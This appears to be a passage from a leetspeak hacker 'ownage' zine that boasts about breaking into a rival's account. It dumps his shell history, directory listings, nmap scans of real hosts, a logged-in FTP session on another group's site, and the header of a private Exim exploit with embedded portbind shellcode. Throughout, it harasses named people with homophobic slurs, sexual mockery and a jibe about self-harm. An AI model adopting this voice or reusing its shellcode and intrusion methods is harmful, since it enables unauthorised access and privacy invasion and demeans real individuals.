sh1t.. // w3 g0t t0 th1nk1ng wh3n w3 s4w rx'z .bash_history. // th1z du0d r3m1ndz m3 0f sk3w w1th h1z el1t3 strcpy() gr3p'1ng sk1llz, // gr3p'1ng f0r m0r3 strcpy() buff3r 0v3rfl0wz th4n sk3w g1v3z bl0wj0bz f0r // k0d3z. [ro0t@jjj]# cat .bash_history w ls -a cd prv/theif/ ls ls -l vim mount.c echo 'hahaha' | write rotor echo 'hahaha' | write rotor echo 'hahaha' | write rotor echo 'LOOK WHAT I FOUND :>' | write rotor echo 'LOOK WHAT I FOUND :>' | write rotor echo 'LOOK WHAT I FOUND :>' | write rotor ^^^^ y0u f0und strcpy(buffer, argv[1]) in strcpy.c. c0ngr4tz, m4n! ^^^^ m4yb3 y0u k4n t34ch r0t0r h0w t0 h4ck. h3h3h3. netstat -a | grep 6667 ps awxu| grep BitchX escreen -r screen -r cd ~ screen -r <- rx d0eznt kn0w y0u c4nt r3sum3 0v3r us3rz scr33n s3zz10nz ls -l umask 077 ls -l mutt ls rm -fr Mail/ ls amn ls prv ls prv/theif/ rmdir prv/theif/ cd prv/c/ ls -l cd ../u ls screen cd ../t cd ../txt/ ls vim zine.txt cd ../txt/ vim zine.h vim zine.txt ls -l cd ../ ls cd c/ ls nasm -o rm remfarslash.S <- muzt b3 s0m3 el1t3 shellc0de ./shex8 -d rm <- 0h sh1t, d0nt rm us ls vim rfind.c ls -l gcc -o rfind rfind.c vim rfind.c ls cd ~ screen -r screen -dr screen -dr pts-0.heroin cd prv/ ls cd c/ ls ./shex8 -d rm ls rm rm <- 1nst34d, try: nasm -f elf -o rm remfarslash.S; ./rm nasm -o 1 newyears.S <- h4ck3rz alw4yz c3l3br4t3 n3w y34rz w1th sh3llc0d3z. ./shex8 -d 1 ls rm 1 nasm -o b beeper.S ./shex8 -d beeper.S ./shex8 -d beeper.S | more ./shex8 -d b ./shex -d /bin/sh | wc -l ./shex8 -d /bin/sh | wc -l ./shex8 -d /bin/sh | grep bytes ./shex8 -d rm | grep bytes ls ./shex8 -d b | grep bytes rm b ls -l ls w screen -r keke cd prv/txt/ ls mkdir el8 ; cd el8 wget http://packetstorm.linuxsecurity.com/mag/~el8/el8_1.txt <- y0u 4r3 n0t 3v3n w0rthy 0f b4b0 sh el8_1.txt ls gcc -o eldump eldump.c ./eldump -vvv <- 0h sh1t, n0w y0u'v3 g0t 0d4y ls ./eldump el8_1.txt -vvv ls ls -l gcc -o eltag eltag.c ./eltag ./eltag -X -f el8_1.txt -o lolx.z nano -w lolx.z rm lolx.z vim eltag.c ls rm el*.c rm eld*.g rm el*.g rm el* ls ls homosexual/ ls 8ball/ ls OpenBSD/ ls el8ch4t/ cd el8ch4t/ ls gcc -o el8ch4t el8ch4t.c ./el8ch4t ./el8ch4t ls rm el8ch4t cd .. ls ls lt ls ripped_k0dez/ <- th1z 1z l00k1n w0rz3 f0r y0u 3v3ry s3c0nd ls testsyscall/ cd lt ls vim so1o vim route ls vim gov-boi vim RLoxley <- d1d y0ur f4th3r 3v3r t0uch y0u, rx? vim emmanuel vim skel cd ~/prv/c/ <- m0r3 pr1v4t3 k0d3z f0r h0no? ls vim o0o.c gcc -o o0o o0o.c vim o0o.c gcc -o o0o o0o.c vim o0o.c gcc -o o0o o0o.c ./o0o vim o0o.c gcc -o o0o o0o.c ./o0o ls rm o0o w ls /home/rotor ls -l nano -w loading.c gcc -o loading loading.c nano -w loading.c gcc -o loading loading.c nano -w loading.c vim loading.c gcc -o loading loading.c vim loading.c gcc -o loading loading.c vim loading.c clear gcc -o loading loading.c # WHAT THE FUCK vim loading.c gcc -o loading loading.c vim loading.c gcc -o loading loading.c ./loading ./loading -h ./loading -t 1 ./loading -t 2 vim loading.c gcc -o loading loading.c ./loading -t 2 ./loading -t 1 ls w ps awxu| grep screen cd ~ screen -r screen -ls epic5 -B -n keke cd ~/prv ls cd c/ ls nasm -o sh execve.S ./shex8 -d sh rm sh ls cd ../../../ ls mkdir pub mv brk_poc2.asm pub vim rx_exim4.c nano -w rx_exim4.c <- uh 0h. w4tch 0ut f0r th3 rx 0d4y. ls vim prtbind.S ls nasm -o prtbind prtbind.S vim prtbind.S nasm -o prtbind prtbind.S ls ./shex8 -d prtbind ./shex8 -d prtbind | grep x00 ls nano -w rx_exim4.c w ls mv prtbind.S prtbind-fbsd.S rm prtbind vim prtbind-linux.S nasm -o prtbind prtbind-linux.S vim prtbind-linux.S nasm -o prtbind prtbind-linux.S vim prtbind-linux.S nasm -o prtbind prtbind-linux.S ./shex8 -d prtbind | grep x00 ./shex8 -d prtbind vim prtbind-linux.S nasm -o prtbind prtbind-linux.S ./shex8 -d prtbind nano -w rx_exim4.c rm prtbind nasm -o prtbind prtbind-fbsd.S rm prtbind nano -w prtbind-fbsd.S nasm -o prtbind prtbind-fbsd.S ./shex8 -d prtbind rm prtbind nano -w rx_exim4.c nasm -o prtbind prtbind-linux.S.S nasm -o prtbind prtbind-linux.S <- g1v3 1t up, y0u c4nt g3t 1t t0 fuqn w0rk! ./shex8 -d prtbind rm prtbind nano -w rx_exim4.c ls w ls ls prv cd prv/c ls nmap -P0 -T4 -vv -oN ../txt/sux2bu.txt 216.32.94.58 nmap -sV -P0 -T4 -vv -oN ../txt/sux2bu-ver.txt 216.32.94.58 ping dynamichell.org ping carbon.2uk2.com cd ../txt/ ls rm sux2bu.txt <- r3n4m3 th1z t0: sux2b0wn3d.txt vi sux2bu-ver.txt cd ../c/audit/ <- n0w 1tz t1m3 t0 gr3p strcpy * ! ls wget ftp://ftp.demon.nl/pub/mirrors/exim/exim4/exim-4.52.tar.gz ls mkdir .tar mv util-linux-2.12r.tar.gz .tar/ tar zxvf exim-4.52.tar.gz mv exim-4.52.tar.gz .tar/ cd exim-4.52/ ls cd src ls grep strlcpy * grep strcpy * <- t0ld y0u. grep strcpy * >> ~/prv/txt/exim-strcpy.txt <- 3y3 th1nk y0u muzt h4v3 r34d sk3w'z 4ud1t1ng tut0r14l. grep memcpy * grep memcpy * >> ~/prv/txt/exim-memcpy.txt grep memset * grep memset * >> ~/prv/txt/exim-memset.txt cd ~/prv/txt/ ls mkdir vdev mv exim-*.txt vdev/ cd vdev/ ls cat exim-strcpy.txt cd ../../c/audit/exim-4.52/src/ ls -l ls ~/prv/txt/ ls ~/prv/txt/vdev/ grep -n strcpy * > ~/prv/txt/exim-strcpy.txt grep -n memcpy * > ~/prv/txt/exim-memcpy.txt grep -n memset * > ~/prv/txt/exim-memset.txt <- 4ll th1z grep'1ng 4nd y0u st1LL f0und _N0TH1NG_ cd ~/prv/txt/ ls cat exim-memset.txt ls mv exim-* vdev/ cd vdev/ ls -l cat exim-strcpy.txt man Ustrcpy cd ../../c/audit/exim-4.52/src/ ^ --- g0nn4 h4q s0m3 .edu'z n0w w1th my n3wf0und smtpd aud1t1ng sk1llz. ls vim exim_lock.c screen ls screen -r screen -r keke screen -r screen -ls screen -r screen -ls cd ~ clear history | wc -l screen -ln -S irc clear w screen -r screen -ln -S code screen -list w last w ls -l ls -l amn cd amn vi emopart.reasons <- h0no w0uld b3 v3ry s4d 1f y0u sl1t y0ur wr1stz! cd ../prv/ ls ls u ls c cd u ; gcc -o rfind rfind.c vim rfind.c gcc -o rfind rfind.c vim rfind.c gcc -o rfind rfind.c vim rfind.c gcc -o rfind rfind.c vim rfind.c gcc -o rfind rfind.c vim rfind.c ls -l ls -l prv ls prv/ cd prv/ chmod -x bab3.tgz ls chmod 600 bab3.tgz ls umask mkdir ark mv bab3.tgz ark ls -l cd ~ screen -r irc screen -r code ls -a ls -a .amn cd prv/ark/ ls scp bab3.tgz rx@klope.rx90.be:~ ls -l ls ls -l clear md5sum bab3.tgz >> bab3.md5 ls -l cat bab3. cat bab3.md5 cat /etc/ssh/sshd_config <- w4tch0ut, h3 kn0wz c0nf1g f1l3z!@# w screen -ls who echo 'yo xtix, i'm about to go to sleep, but tommorow we can audit that openbsd bug.. and i found a bug in exim4.52 that i was working on today, and should be finished soon.. ttyl' >> tmp.txt echo 'yo xtix, i\'m about to go to sleep, but tommorow we can audit that openbsd bug.. and i found a bug in exim4.52 that i was working on today, and should be finished soon.. ttyl' >> tmp.txt echo "yo xtix, i\'m about to go to sleep, but tommorow we can audit that openbsd bug.. and i found a bug in exim4.52 that i was working on today, and should be finished soon.. ttyl" >> tmp.txt cat tmp.txt | write rs rm -f tmp.txt ls clear who tty ps axwu | grep pty/4 ps axwu | grep pts/0 kill -9 19162 who ls cd prv ; ls ls tmp ls ark ls txt ls u cd c ls epic5 -B -n lo3 cd prv/ cd prv/ w ls ls prv mkdir prv img mv img prv mv *.gif prv/img/ rm arro mv hfj.tgz prv/ark/ ls wget ftp://ftp.ssh.com/pub/ssh/ssh-3.2.9.1.tar.gz &> /dev/null wget ftp://ftp.ssh.com/pub/ssh/ssh-3.2.9.1.tar.gz.sig-gpg &> /dev/null locate gnupg cat ssh-3.2.9.1.tar.gz.sig-gpg clear unclear clear ls clear ls -la ls -a .ss ls -a .ssh/ w ls /home/stfukthx/u ls /home/stfukthx/ rm -fr /home/stfukthx/* ls /home/stfukthx cat .bash_profile ls .ssh # WOW last | grep stfukthx last umask umask 077 chmod 600 * ^^^^ y0ur chm0d sk1llz ar3 imp3cc4bl3. ls -a chmod 600 .* ls -a ls -a chmod 777 . umask clear ls ls /home ls -l /home | grep -n stfukthx ls /home ls /home/dhell ls -l w ls /tmp cd .. tar cvzf rx.o rx -C /tmp ls /tmp w clear write rs w ls rx cd rx ls -la wls ls write rx write rs echo 'storm got openssh-current/stable 0day'| write rs <- wh3r3z d4 0d4yz????? clear write rs write rs clear w cd prv/c cd prv/ ls cd prv/ ls -l cd prv ls prv cd prv c cd c/ ls cd audit/ ls cd util-linux-2.12r/login-utils/ ls grep strcpy chfn.c <- 0h n0! n0t m0r3 gr3p'1ng f0r strcpy()'z cd ../../ cd .. ls -l gcc -o ircf ircfuzz.c <- l1k3 y0u c0uld 3xpl01t 4nyth1ng y0u f1nd w/ th1z! ./ircf ./ircf -h ./ircf asdrc2[uR3 ps awxu| grep ircf ps awxu| grep irc ls cat ircf clear reset clear ls cat ircfuzz.c ls ./ircf ./ircf ./ircf irc.efnet.net grep argv ircfuzz.c grep argv 66666 <- th1z k1d l0v3z h1z grep ./ircf 444444 w cd ~ w w wh3n y0u f1n4lly f1nd a vuLn l34v3 1t 1n /h0m3/h0no f0r us. 4ll w3 fuqn f0und 0f y0urz w4z p0rn. [ro0t@jjj:/h0no]# tar -zxvf bab3.tgz bab3/ bab3/h039.jpg bab3/s02.jpg bab3/s07.jpg bab3/s08.jpg bab3/s12.jpg bab3/s14.jpg bab3/h071.jpg bab3/h075.jpg bab3/h085.jpg bab3/h094.jpg bab3/h098.jpg bab3/h133.jpg bab3/u10.jpg bab3/u11.jpg bab3/u13.jpg bab3/u14.jpg bab3/a15.jpg bab3/b05.jpg bab3/b06.jpg bab3/b08.jpg [ro0t@jjj:/h0no]# tar -zxvf hfj.tgz hfj/ hfj/hackforjes.us/ hfj/hackforjes.us/index.html hfj/hackforjes.us/images/ hfj/hackforjes.us/images/407.jpg hfj/hackforjes.us/images/mosthatedbbq.jpg <- th1z guy 1z l4m3, but h3'z h4ck3d m0r3 th4n y0u hfj/hackforjes.us/images/P1010018.JPG hfj/hackforjes.us/images/lesbo-chicken.jpeg hfj/hackforjes.us/images/emmanuelbbq.jpg hfj/hackforjes.us/images/captainchicken.jpg hfj/hackforjes.us/images/clockfag.jpg hfj/hackforjes.us/images/mitnichicken-octo.jpg hfj/hackforjes.us/images/igorhep2.jpg hfj/hackforjes.us/images/ziplockbbq.jpg hfj/hackforjes.us/images/bbq-boobies.jpg hfj/hackforjes.us/images/wouldntfuckdarkn3ss.jpg hfj/hackforjes.us/images/chrakschicken.jpg hfj/hackforjes.us/images/laveychicken.jpg hfj/hackforjes.us/images/cvxdotbbq.jpg hfj/hackforjes.us/images/lolsquito.jpg hfj/hackforjes.us/images/chickenwing.jpg hfj/hackforjes.us/images/mitnickchicken.jpg hfj/hackforjes.us/images/rloxleyhasamustache4dp.jpg hfj/hackforjes.us/images/shipleychicken.jpg hfj/hackforjes.us/images/bronchicken.jpg hfj/hackforjes.us/images/broncvixchicken.jpg hfj/hackforjes.us/images/shilohchicken.jpg hfj/hackforjes.us/images/bbq-setient.jpg hfj/hackforjes.us/images/2600bbqsetient.jpg hfj/hackforjes.us/images/bbq-chicken.jpg hfj/hackforjes.us/Bar-B-Q Pope.mp3 [ro0t@jjj:/h0no]# ls -al total 8 drwx------ 8 1002 users 1024 Jan 5 14:22 . drwxr-xr-x 6 root root 1024 Jan 6 02:31 .. drwx------ 4 1002 users 1024 Jan 6 02:47 ark drwx------ 6 1002 users 1024 Jan 5 15:07 c drwx------ 2 1002 1002 1024 Jan 5 14:22 img drwx------ 2 1002 users 1024 Jan 2 07:37 tmp drwx------ 4 1002 users 1024 Jan 3 17:03 txt drwx------ 2 1002 users 1024 Jan 3 18:46 u // w3 h4v3 f0und th3 3xtr3m3ly w3ll-h1dd3n 0day 4rch1v3. // th4nk y0u f0r y0ur k1nd d0n4ti0n t0 h0no. [ro0t@jjj:/h0no]# ls -al c total 97 drwx------ 6 1002 users 1024 Jan 5 15:07 . drwx------ 8 1002 users 1024 Jan 5 14:22 .. -rw------- 1 1002 users 627 Jan 4 12:07 arro.c drwx------ 4 1002 users 1024 Jan 3 16:52 audit -rw-r--r-- 1 1002 users 528 Jan 2 02:04 beeper.S -rw-r--r-- 1 1002 users 374 Jan 2 02:09 binsh.c drwx------ 2 1002 users 1024 Jan 4 22:22 bof -rw------- 1 1002 users 589 Jan 4 15:34 count.c -rw-r--r-- 1 1002 users 229 Jan 2 02:04 execve.S -rwx------ 1 1002 1002 20200 Jan 5 15:07 ircf -rw------- 1 1002 1002 7832 Jan 5 15:07 ircfuzz.c -rwx------ 1 1002 users 12990 Jan 2 11:14 loading -rw------- 1 1002 users 1174 Jan 2 11:14 loading.c -rwx------ 1 1002 users 12694 Jan 4 14:47 lol -rw-r--r-- 1 1002 users 394 Jan 2 02:04 newyears.S -rw------- 1 1002 users 1037 Jan 2 10:53 o0o.c -rw------- 1 1002 users 966 Jan 3 18:20 prtbind-fbsd.S -rw------- 1 1002 users 692 Jan 3 18:19 prtbind-linux.S drwx------ 2 1002 users 1024 Jan 3 17:08 pub -rw-r--r-- 1 1002 users 456 Jan 2 02:04 remfarslash.S -rw------- 1 1002 users 2251 Jan 4 21:54 rx_exim4.c ^^^^ 0mg0mg0mg!$$!$ w3'v3 b33n try1ng t0 f1nd th1z 0hd4y f0r y34rz s0 w3 k4n h4q 1nt0 4ll th0z3 .edu'z runn1ng exim drwx------ 2 1002 users 1024 Jan 2 05:10 scrpt -rwx------ 1 1002 users 13908 Jan 2 04:05 shex8 -rw-r--r-- 1 1002 users 1727 Jan 2 02:08 shex8.c -rw------- 1 1002 users 553 Jan 2 06:23 suidperl.pl // j4ckp0t! th3 z1n3 0f 4LL zin3z... c1zc0!@$$!%$ // w3'v3 b33n s34rch1ng f0r th1z c0v3t3d z1n3 f0r // m4ny m0nthz. az y0u k4n pr0bably t3ll, 1t iz // f0und3d by th3 gr34t h4ck3r r0t0r. [ro0t@jjj:/h0no]# cd txt [ro0t@jjj:/h0no/txt]# head -n10 zine.txt echo -e " c1zc0 Security presents: c1zc0 zine " echo -e " Editor: rotor " echo -e " IRC: irc.efnet.org #c1zc0 " echo -e " URL: http://www.c1zc0.com " echo -e " This zine is dedicated to to my homie west " // h0ly fuqn sh1t, th4t z1n3 w4z l4m3r th4n CDEJ. c0ngr4tz r0t0r! // wh4tz 3v3n funn13r 1z th4t th3y d0ubl3-sp4c3d 4ll th31r sh1t // s0 1t w0uld t4k3 up m0r3 sp4c3. h4h4h4. (th3y d0nt h4v3 3n0ugh // k0nt3nt) [ro0t@jjj:/h0no/txt]# cat me.txt # nmap 3.81 scan initiated Mon Jan 2 07:38:43 2006 as: nmap -T4 -P0 -vv -oN me.txt klope.rx90.be All 1663 scanned ports on c-66-31-110-65.hsd1.ma.comcast.net (66.31.110.65) are: filtered # Nmap run completed at Mon Jan 2 07:48:01 2006 -- 1 IP address (1 host up) scanned in 558.239 seconds [ro0t@jjj:/h0no/txt]# cat sux2bu-ver.txt # nmap 3.81 scan initiated Tue Jan 3 16:47:01 2006 as: nmap -sV -P0 -T4 -vv -oN ../txt/sux2bu-ver.txt 216.32.94.58 Interesting ports on carbon.2uk2.com (216.32.94.58): (The 1646 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE VERSION 21/tcp open ftp PureFTPd 23/tcp closed telnet 25/tcp open smtp Exim smtpd 4.52 26/tcp open smtp Exim smtpd 4.52 53/tcp open domain ISC Bind 9.2.4 80/tcp open http Apache httpd 110/tcp open pop3 143/tcp open imap UW Imapd 2003.339p-cpanel 443/tcp open http Apache httpd 993/tcp open ssl/imap UW Imapd 2003.339p-cpanel 995/tcp open ssl/pop3 1214/tcp closed fasttrack 3306/tcp open mysql MySQL (unauthorized) 4660/tcp closed mosmig 4672/tcp closed rfa 6346/tcp closed gnutella 6699/tcp closed napster 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port110-TCP:V=3.81%D=1/3%Time=43BAF123%P=i686-pc-linux-gnu%r(NULL,30,"\ SF:+OK\x20POP3\x20carbon\x20\[cppop\x2020\.0\]\x20at\x20\[216\.32\.94\.58\ SF:]\r\n")%r(GenericLines,6C,"\+OK\x20POP3\x20carbon\x20\[cppop\x2020\.0\] SF:\x20at\x20\[216\.32\.94\.58\]\r\n-ERR\x20Command\x20not\x20implemented\ SF:r\n-ERR\x20Command\x20not\x20implemented\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port995-TCP:V=3.81%T=SSL%D=1/3%Time=43BAF133%P=i686-pc-linux-gnu%r(NULL SF:,2D,"\+OK\x20POP3\x20carbon\x20\[cppop\x2020\.0\]\x20at\x20\[127\.0\.0\ SF:.1\]\r\n")%r(GenericLines,69,"\+OK\x20POP3\x20carbon\x20\[cppop\x2020\. SF:0\]\x20at\x20\[127\.0\.0\.1\]\r\n-ERR\x20Command\x20not\x20implemented\ SF:r\n-ERR\x20Command\x20not\x20implemented\r\n"); # Nmap run completed at Tue Jan 3 16:48:40 2006 -- 1 IP address (1 host up) scanned in 99.065 seconds // n0t3: th4tz az f4r az rx g0t wh3n h3 tr13d h4ck1ng c4rb0n.2uk2.c0m. [ro0t@jjj:/h0no/txt]# cd .. // uh 0h. 4scii p0rn 0day. [ro0t@jjj:/h0no]# cat c/o0o.c #include #include void make(char *s) { fprintf(stderr, "\r%s", s); usleep(rand()%60000+30000); return; } int main(int argc, char **argv) { printf("[+] hahaeaehaehae0eh0ae00eh0ha0\n"); while (1) { make("8=(,,,)======D ({:})"); make("8==(,,,)=====D ({:})"); make("8===(,,,)====D ({:})"); make("8====(,,,)===D ({:})"); make("8=====(,,,)==D ({:})"); make("8======(,,,)=D ({:})"); make("8=====(,,,)==D ({:})"); make("8====(,,,)===D ({:})"); make("8===(,,,)====D ({:})"); make("8==(,,,)=====D ({:})"); make("8=(,,,)======D~ ({:})"); make("8==(,,,)=====D~ ~ ({:})"); make("8===(,,,)====D~ ~~ ({:})"); make("8====(,,,)===D ~ ~~~ ~ ({:})"); make("8=====(,,,)==D ~ ~~ ~({:})"); make("8======(,,,)=D ~~~ ~({:})"); } return(0); } [ro0t@jjj:/h0no]# cat c/rx_exim4.c /* * exim smtpd <= 4.52 * * by: rx * website: http://www.corestorm.com * email: rx @ corestorm.com * ******************************************************** * @@@@@@@ @@@@@@ @@@@@@@ @@@@@@@@* * !@@ @@! @@@ @@! @@@ @@! * * !@! @!@ !@! @!@!!@! @!!!:! * * :!! !!: !!! !!: :!! !!: * * :: :: : : :. : : : : : :: :::* * @@@@@@ @@@@@@@ @@@@@@ @@@@@@@ @@@@@@@@@@ * * !@@ @@! @@! @@@ @@! @@@ @@! @@! @@!* * !@@!! @!! @!@ !@! @!@!!@! @!! !!@ @!@* * !:! !!: !!: !!! !!: :!! !!: !!:* * ::.: : : : :. : : : : : : * ******************************************************** * * bug in : exim-4.52/src/exim_lock.c * function : strcpy()(lulz) * * ------------------------------------------------------ * KEEP THIS CODE FUCKING PRIVATE OR I'LL PUNCH UR FACE * ------------------------------------------------------ */ // [ uh 0h, rx 1z g0ing t0 punch uz. wh4t w1LL w3 d0? 0h w41t, // h3'z alr34dy 0wn3d. l0lz. ] #include #include #include #include #include #include #include #include #ifdef __FABSDEE char opcode[] = "\x31\xc0\x31\xc9\x99\x50\x6a\x01\x6a\x02\x50\xb0\x61\xcd\x80" "\x92\x68\xaa\x02\xaa\xaa\x89\xe6\x6a\x10\x56\x52\xb0\x68\x6a" "\x01\xcd\x80\x52\xb0\x6a\x51\xcd\x80\x50\x52\x99\xb0\x1e\x52" "\xcd\x80\xb1\x03\x89\xc3\x53\xb0\x5a\x42\x52\xcd\x80\xe2\xf7" "\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x51" "\x53\x50\xb0\x5a\xcd\x80"; // 81b portbind // rx @ corestorm #endif #ifdef __LUNIX char opcode[] = "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d" "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41" "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f" "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44" "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24" "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14" "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0" "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; // 96b portbind // rx @ corestorm #endif void usage(char *); int main(int argc, char **argv) { int ch; // h4h4h4h4h4h4h4h4h4... l4m3. [ro0t@jjj:/h0no]# head -n4 c/suidperl.pl #!/usr/bin/perl # # (c) rx # // w0w th4tz s0m3 eleet sh1t. wh4t, 1z th1z th3 fuqn 90z? suidperl 3xpl01tz. w3 w0uld l1k3 t0 c0ngr4tul4t3 rx f0r h1z sup3r10r 4ud1t1ng sk1llz (gr3p'1ng f0r strcpy 4nd m3mcpy 1z 3l1t3), 4nd h1z supr3m3 1n4b1l1ty t0 t4b h1z k0d3. y0u 4r3 l4m3. 4nd d0nt 3v3n try uz3 th3 3xcus3 th4t y0u w3r3 st0n3d, y0u m1dg3t fuck3r. wh0 th3 fuck c0d3zz 4scii p0rn 4n1m4t10n pr0gr4mz 4nyw4y??? 4r3 y0u s0 s3xu4lly d3pr1v3d th4t y0u h4v3 t0 r3s0rt t0 typ1ng 4scii p3n1s3s? 1tz n0t h4rd f0r 4 g4y m4n t0 g3t l41d. juzt g0 4sk bx, h3 m1ght 3v3n l3t y0u suck 0n h1z m4nb00bz 1f y0u g1v3 h1m 0d4y (w41t, y0u h4d n0n3). 1f y0u w4nt t0, y0u k4n s3nd h1m 4 l3tt3r. m4yb3 h3'll f33l y0ur p41n 4nd t4k3 p1ty up0n y0ur p4th3t1c s0ul: [l3tt3r] d34r bx, 3y3 4m rx, a r34l h4ck3r l1k3 y0urs3lf. f0r my m4ny y34rz 4z 4 t33n4g3r 1'v3 b33n d3pr1v3d 0f s3x 1n 4ll f0rmz (0k, 3xc3pt w1th my h4nd). 4z 4 y0ung t33n4g3r, 3y3 4m v3ry curi0uz ab0ut s3x. h0no t0ld m3 th4t 1f 3y3 4sk n1c3ly, y0u w0uld h4v3 cyb3rs3x w1th m3? th3y sp3c1f1k4lly s41d th4t y0u'd l3t m3 suck 0n y0ur m4n b00bz. 0mg, l13k, d3wd, 3ye'v3 4lw4yz dr34mt 0f such 4 t4sk. s1nc3 3y3 4m s0 n3w t0 s3x, 1'll b3 w1LL1ng t0 r3c31v3 1f w3 h4v3 4n4l. 1'd pr3m4tur3ly 3j4kul4t3 4nyw4yz :(. th4nk y0u, 4nd 3y3 4m l00k1ng f0rw4rd t0 cyb3rs3x w1th y0u (PL34Z3!!). l0v3, rx [/l3tt3r] th3r3 y0u h4v3 1t, rx. m4k3 sur3 t0 k33p 1t 1n 3l1t3 sp34k, 0r 3lz3 h3 w1LL t0t4lly d1sr3g4rd 1t! bx 1z 0n 3fn3t 1n m4ny ch4nn3lz l1k3 #!bl4ckh4t. d0nt w0rry, 3fn3t 1zn't sn1ff3d, s0 f33l fr33 t0 t4k3 1t t0 a pr1v8 msg. n3xt up 1z y0ur gr0up.. corestorm. h4r h4r h4r! 24.txt -~-~-~ th3 f41l3d corestorm t34m rotor, nc, and tsao formed a group. corestorm. corestorm > dynamichell haha corestorm is gonna be the next teso i'm telling you not teso if we can get a solid team, we'll own * corestorm is the next w00w00 + teso w3ll n0w! w1tH th4t s41d w3 h4d t0 s33 1f th3y h4d 4ny w4r3z w0r7h st34l1n9! ftp> open (to) ftp.corestorm.com Connected to premium6.ftp.geo.yahoo.akadns.net. 220-Welcome to the Yahoo! Web Hosting FTP server. 220-Need help? Get all details at: 220-http://help.yahoo.com/help/us/webhosting/gftp/ 220- 220-No anonymous logins accepted. 220 Yahoo! Name (ftp.corestorm.com:rs): corestormdotcom 331-Enter your Yahoo! member password 331 Password: 230-You are using 0.4% of your subscribed disk space 230-You have 4979.612 MB of space available 230 Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for /corestormdotcom/ . total 1504 -rw-rw-r-- 1 1585250 1000000 8138 Jan 13 13:06 Kalle2.jpg drwxrwxr-x 10 1585250 1000000 4096 Feb 17 19:19 board drwxrwxr-x 2 1585250 1000000 4096 Dec 9 21:12 chicks -rw-rw-r-- 1 1585250 1000000 22529 Dec 8 23:28 corestorm2.jpg drwxrwxr-x 2 1585250 1000000 4096 Dec 16 23:36 cs -rw-rw-r-- 1 1585250 1000000 1473 Jan 13 13:29 donations.htm -rw-rw-r-- 1 1585250 1000000 2144 Dec 15 09:13 exp.pl -rw-rw-r-- 1 1585250 1000000 12948 Dec 27 00:49 httpd -rw-rw-r-- 1 1585250 1000000 1420 Jan 13 13:32 index.html -rw-rw-r-- 1 1585250 1000000 12082 Jan 2 00:55 juno drwxrwxr-x 12 1585250 1000000 4096 Dec 9 19:22 nuke -rw-rw-r-- 1 1585250 1000000 11411 Dec 27 01:57 ptrace drwxrwxr-x 2 1585250 1000000 4096 Jan 4 17:07 school -rw-rw-r-- 1 1585250 1000000 625221 Dec 9 03:05 shV5.tgz -rw-rw-r-- 1 1585250 1000000 10372 Dec 26 15:38 test1 drwxrwxr-x 2 1585250 1000000 4096 Jan 15 17:27 tmp -rw-rw-r-- 1 1585250 1000000 14425 Jan 1 06:59 unrealircd.conf 226 Transfer complete. ftp> ftp> ls school 200 PORT command successful. 150 Opening ASCII mode data connection for /corestormdotcom/school . total 16 -rw-rw-r-- 1 1585250 1000000 1479 Jan 4 17:07 page27.rtf -rw-rw-r-- 1 1585250 1000000 1771 Jan 4 17:07 page28.rtf 226 Transfer complete. ftp> ftp> ls tmp 200 PORT command successful. 150 Opening ASCII mode data connection for /corestormdotcom/tmp . total 16 -rw-rw-r-- 1 1585250 1000000 2144 Dec 15 09:14 exp.pl -rw-rw-r-- 1 1585250 1000000 522 Dec 17 04:14 mailError.log 226 Transfer complete. ftp> # 0hd4y!, w3 w1ll l00k 4t th1z l4t3r th0u9h ftp> ls nuke 200 PORT command successful. 150 Opening ASCII mode data connection for /corestormdotcom/nuke . total 528 -rwxrwxr-x 1 1585250 1000000 8340 Dec 9 19:22 ADDONS-MODULES -rwxrwxr-x 1 1585250 1000000 55576 Dec 9 19:22 CHANGES -rwxrwxr-x 1 1585250 1000000 15515 Dec 9 19:22 COPYING -rwxrwxr-x 1 1585250 1000000 2112 Dec 9 19:22 CREDITS -rwxrwxr-x 1 1585250 1000000 8892 Dec 9 19:22 INSTALL -rwxrwxr-x 1 1585250 1000000 2663 Dec 9 19:22 README -rwxrwxr-x 1 1585250 1000000 1617 Dec 9 19:22 SUPPORT -rwxrwxr-x 1 1585250 1000000 847 Dec 9 19:22 TODO -rwxrwxr-x 1 1585250 1000000 2738 Dec 9 19:22 TRANSLATIONS -rwxrwxr-x 1 1585250 1000000 319 Dec 9 19:22 UPGRADE drwxrwxr-x 6 1585250 1000000 4096 Dec 9 19:22 admin -rwxrwxr-x 1 1585250 1000000 14938 Dec 9 19:22 admin.php -rwxrwxr-x 1 1585250 1000000 2323 Dec 9 19:22 auth.php -rwxrwxr-x 1 1585250 1000000 2273 Dec 9 19:22 backend.php -rwxrwxr-x 1 1585250 1000000 15545 Dec 9 19:22 banners.php drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 blocks -rwxrwxr-x 1 1585250 1000000 3208 Dec 9 19:22 config.php -rwxrwxr-x 1 1585250 1000000 2921 Dec 9 19:22 footer.php -rwxrwxr-x 1 1585250 1000000 2263 Dec 9 19:22 header.php drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 html drwxrwxr-x 13 1585250 1000000 4096 Dec 9 19:22 images drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 includes -rwxrwxr-x 1 1585250 1000000 2577 Dec 9 19:22 index.php drwxrwxr-x 2 1585250 1000000 4096 Dec 9 19:22 language -rwxrwxr-x 1 1585250 1000000 34041 Dec 9 19:22 mainfile.php 